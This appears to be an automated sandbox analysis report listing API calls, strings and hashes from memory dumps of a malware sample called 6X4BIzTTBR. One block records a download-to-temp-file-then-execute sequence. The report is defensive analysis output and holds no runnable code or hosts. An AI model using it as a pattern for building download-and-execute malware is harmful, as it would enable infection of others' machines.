                                                      • GetCurrentThreadId.KERNEL32 ref: 046F0C46
                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 046F0CAD
                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 046F0CCA
                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 046F0D30
                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 046F0D45
                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 046F0D57
                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 046F0D85
                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 046F0D90
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F0DBC
                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 046F0DCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                      • String ID: "1@
                                                      • API String ID: 3720063390-1946750398
                                                      • Opcode ID: 0da021dce339e6c5e70aef212f33f501f174c1cfcf747e02e6bdfd12c65449a8
                                                      • Instruction ID: 6ffa01252ccc211ddf83f601615f4f0b2e6a17687cd414e7bfa52affffbe9d82
                                                      • Opcode Fuzzy Hash: 0da021dce339e6c5e70aef212f33f501f174c1cfcf747e02e6bdfd12c65449a8
                                                      • Instruction Fuzzy Hash: 27419170A052449BEF14FBA488547FD7BA5AF42348F04406ECA865B283FB757E06CB69
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction ID: 195640b83fa4041eb123fba71c0e82297226833d55f527a477398d12d2dd32bd
                                                      • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                      • Instruction Fuzzy Hash: DFC14172E40205BBDB20DBA9CC43FEF77B8AB08744F15516AFA44FB282D6B49D418764
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 046D2C8F
                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 046D2CA5
                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 046D2CC1
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 046D2CD7
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 046D2D10
                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 046D2D4C
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 046D2D69
                                                      • ShellExecuteExW.SHELL32(?), ref: 046D2DE0
                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 046D2DF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                      • String ID: <
                                                      • API String ID: 838076374-4251816714
                                                      • Opcode ID: 50495f8a938e9b7a5c9bfa4e26d13ce4a8d9663e1cccc8122135cbc2badad0f5
                                                      • Instruction ID: 1f1809e748a11fa2124e8a5f495f23b8e7dd1d6a4aa3c5d865dd1cb362ec0e05
                                                      • Opcode Fuzzy Hash: 50495f8a938e9b7a5c9bfa4e26d13ce4a8d9663e1cccc8122135cbc2badad0f5
                                                      • Instruction Fuzzy Hash: 5E414F7190061CAEEB209F64DC85FEAB7BCFF15745F0081F9A549E2150EE709E868FA4
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424876
                                                        • Part of subcall function 00424B45: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245A9), ref: 00424B55
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042488B
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042489A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004248A8
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042491E
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042495E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042496C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID: "1@$pContext$switchState
                                                      • API String ID: 3151764488-3271222483
                                                      • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction ID: ab6feeab3b7a6b85191c522ab8c92a4af9d5d2bb2e0248aa5a41338dc0268d27
                                                      • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction Fuzzy Hash: 2D31D635B002249BCF04EF69D881A6E73B5FF84314F61456BE915A7382DB78EE05CB98
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C23,000000FF,?,046EF238,00000004,046E7D97,00000004,046E8079), ref: 046EEF09
                                                      • GetLastError.KERNEL32(?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000,?), ref: 046EEF15
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000), ref: 046EEF25
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 046EEF3B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF51
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF68
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF7F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF96
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEFAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: 0e0aa7511f727ecc6fb206cd812b8d5cbe6e85ff873638c6fe134d9629160755
                                                      • Instruction ID: 9e3647531117448f5d51b9fab89939a81cb28f20c174702abcb505e23893115a
                                                      • Opcode Fuzzy Hash: 0e0aa7511f727ecc6fb206cd812b8d5cbe6e85ff873638c6fe134d9629160755
                                                      • Instruction Fuzzy Hash: 452195B1915710BFE7106FB9DC48A69BFECEF05B16F004A2AF541D3640DB7C95408BA8
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C23,000000FF,?,046EF238,00000004,046E7D97,00000004,046E8079), ref: 046EEF09
                                                      • GetLastError.KERNEL32(?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000,?), ref: 046EEF15
                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,046EF238,00000004,046E7D97,00000004,046E8079,?,046E87A9,?,00000008,046E801D,00000000,?,?,00000000), ref: 046EEF25
                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 046EEF3B
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF51
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF68
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF7F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEF96
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 046EEFAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2340687224-4050573280
                                                      • Opcode ID: a8612e5b23a925facd6796a3e5b292861b9268635af447aec4c94fc110107543
                                                      • Instruction ID: 816d3110a002b142acfec0223beedaf8b8811a119c75c10c585e3e60892e27df
                                                      • Opcode Fuzzy Hash: a8612e5b23a925facd6796a3e5b292861b9268635af447aec4c94fc110107543
                                                      • Instruction Fuzzy Hash: EB21A4B2915710BFE7106F79DC48A6ABFECEF05B16F004A2AF541D3640DB7CA5408BA8
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,046E671B), ref: 046E24C6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 046E24D4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 046E24E2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,046E671B), ref: 046E2510
                                                      • GetProcAddress.KERNEL32(00000000), ref: 046E2517
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E2532
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E253E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2554
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2562
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                      • Instruction ID: 8c6d805b5136705fe9597eefc7a9138325f78f81afde182292b937833ba3307d
                                                      • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                      • Instruction Fuzzy Hash: 6A11C2759023107FF7107B7A6DADA7B3BEDAE05A12710056AB402D3251FB78E900866C
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044019F), ref: 0043EED5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: "1@$acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-387934149
                                                      • Opcode ID: 282eee1a7bf40a219ff437852848af6664f81389b32cecd41840f86b0f9bdce7
                                                      • Instruction ID: 9fd4e678bf913fb8b46125665d9ae2d0c16e862613d5871dab2415aa518b1ef4
                                                      • Opcode Fuzzy Hash: 282eee1a7bf40a219ff437852848af6664f81389b32cecd41840f86b0f9bdce7
                                                      • Instruction Fuzzy Hash: A651BF7490050ADBCF14DF99E6485ADBBB0FB0D300F2551A7D481A6355C7B98D29CB1E
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419778
                                                      • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419782
                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00419789
                                                      • SafeRWList.LIBCONCRT ref: 004197A8
                                                        • Part of subcall function 00417777: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417788
                                                        • Part of subcall function 00417777: List.LIBCMT ref: 00417792
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197BA
                                                      • GetLastError.KERNEL32 ref: 004197C9
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197DF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                      • String ID: eventObject
                                                      • API String ID: 1999291547-1680012138
                                                      • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                      • Instruction ID: b565d633965123d241c47b701b73221d24ae2dfa48e938e47ac4bdd02f6dee76
                                                      • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                      • Instruction Fuzzy Hash: 0C11A075500104EADB14EFA5CC49FEE77B8AF00701F20412BF416E21D1EB789E848A6D
                                                      APIs
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415259
                                                        • Part of subcall function 00414C6A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C7E
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415282
                                                        • Part of subcall function 004130E4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413100
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152A9
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415163
                                                        • Part of subcall function 00413148: __EH_prolog3_GS.LIBCMT ref: 0041314F
                                                        • Part of subcall function 00413148: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041315E
                                                        • Part of subcall function 00413148: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413165
                                                        • Part of subcall function 00413148: GetCurrentThread.KERNEL32 ref: 0041318D
                                                        • Part of subcall function 00413148: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413197
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415184
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151BB
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151FE
                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152F1
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415315
                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415322
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                      • String ID:
                                                      • API String ID: 64082781-0
                                                      • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction ID: a544b122dba078d289a9d828bf0ebb9c492af17023c83a7e7c7f030abb93a1bc
                                                      • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction Fuzzy Hash: 25617C71A00715DFDB18CFA5E8D26EEB7A1FB84306F24806ED44697252D739A981CF48
                                                      APIs
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 046E54C0
                                                        • Part of subcall function 046E4ED1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 046E4EE5
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 046E54E9
                                                        • Part of subcall function 046E334B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E3367
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 046E5510
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 046E53CA
                                                        • Part of subcall function 046E33AF: __EH_prolog3_GS.LIBCMT ref: 046E33B6
                                                        • Part of subcall function 046E33AF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 046E33C5
                                                        • Part of subcall function 046E33AF: GetProcessAffinityMask.KERNEL32(00000000), ref: 046E33CC
                                                        • Part of subcall function 046E33AF: GetCurrentThread.KERNEL32 ref: 046E33F4
                                                        • Part of subcall function 046E33AF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 046E33FE
                                                      • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 046E53EB
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E5422
                                                      • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 046E5465
                                                      • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 046E5558
                                                      • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 046E557C
                                                      • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 046E5589
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                      • String ID:
                                                      • API String ID: 64082781-0
                                                      • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction ID: 248590ebb54d9aeaf6e751e18e911da5eb02c1a9541a0f4a95a00035293846d2
                                                      • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                      • Instruction Fuzzy Hash: 9A617971A02315EFDB18CFA6E89167DB7E1BF4431AF24802DD44697292EB31B941CB48
                                                      APIs
                                                      • _free.LIBCMT ref: 00431E0A
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 00431E16
                                                      • _free.LIBCMT ref: 00431E21
                                                      • _free.LIBCMT ref: 00431E2C
                                                      • _free.LIBCMT ref: 00431E37
                                                      • _free.LIBCMT ref: 00431E42
                                                      • _free.LIBCMT ref: 00431E4D
                                                      • _free.LIBCMT ref: 00431E58
                                                      • _free.LIBCMT ref: 00431E63
                                                      • _free.LIBCMT ref: 00431E71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 55fbbdd4ea06f5b10c0744cf7494cbd8d712eafe635c256bcb453848a6529aa7
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: 2711A7B6100108AFCB02EF55C852DD93F65EF18395F1190AAF9588B232D636DF519B84
                                                      APIs
                                                      • _free.LIBCMT ref: 04702071
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470207D
                                                      • _free.LIBCMT ref: 04702088
                                                      • _free.LIBCMT ref: 04702093
                                                      • _free.LIBCMT ref: 0470209E
                                                      • _free.LIBCMT ref: 047020A9
                                                      • _free.LIBCMT ref: 047020B4
                                                      • _free.LIBCMT ref: 047020BF
                                                      • _free.LIBCMT ref: 047020CA
                                                      • _free.LIBCMT ref: 047020D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction ID: 368e4b391467078f1c9f93a8336b62189e2447d2a7b390d5aaf662841fcc5068
                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                      • Instruction Fuzzy Hash: F8117476502108FFDB01EF54C845DD93BA5EF05358B5181A5FE098B3A1DA33EE64EB80
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID: W(@$W(@
                                                      • API String ID: 4189289331-2771400755
                                                      • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction ID: 07d08be1f67778e7122509fe8e18c1c46be534b65d2bcfd2776667e36f53a30d
                                                      • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                      • Instruction Fuzzy Hash: 97512832600211EBDB249B5BEC41BAF77A8EF49324F90425FF815A7282DB3DD900867D
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042870B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00428713
                                                      • _ValidateLocalCookies.LIBCMT ref: 004287A1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004287CC
                                                      • _ValidateLocalCookies.LIBCMT ref: 00428821
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: "1@$0fB$csm
                                                      • API String ID: 1170836740-3151313498
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: bea877f61e034c6a042fa83f1e95de6e61d9a31ef2d1101b3af7d6bc6a73fe3e
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: 2841F934B012289BCF10DF19DC45A9F7BB5AF84328F64815FE9146B392CB399D11CB99
                                                      APIs
                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 046F4ADD
                                                        • Part of subcall function 046F4DAC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,046F4810), ref: 046F4DBC
                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 046F4AF2
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F4B01
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F4B0F
                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 046F4B85
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F4BC5
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F4BD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                      • String ID: "1@
                                                      • API String ID: 3151764488-1946750398
                                                      • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction ID: 7a73898d81e84a2e0d134c0bf6770abdf1203e9b220bbf0e7151d261c75beea6
                                                      • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                      • Instruction Fuzzy Hash: 1D31D835A002149BDF08EF68CC80A6F77B5FF64214F2044A9DA559B745FF70F9028794
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction ID: 01d4063979c735712e48ff0136095b9989afe7bc8cdebc3eec8e5fcc6931ca32
                                                      • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                      • Instruction Fuzzy Hash: 8AC1B3B0A05249EFDB12DFA9C840BADBFF0AF09314F048199E954AB3D2D734A941CB65
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • _memcmp.LIBVCRUNTIME ref: 0043117C
                                                      • _free.LIBCMT ref: 004311ED
                                                      • _free.LIBCMT ref: 00431206
                                                      • _free.LIBCMT ref: 00431238
                                                      • _free.LIBCMT ref: 00431241
                                                      • _free.LIBCMT ref: 0043124D
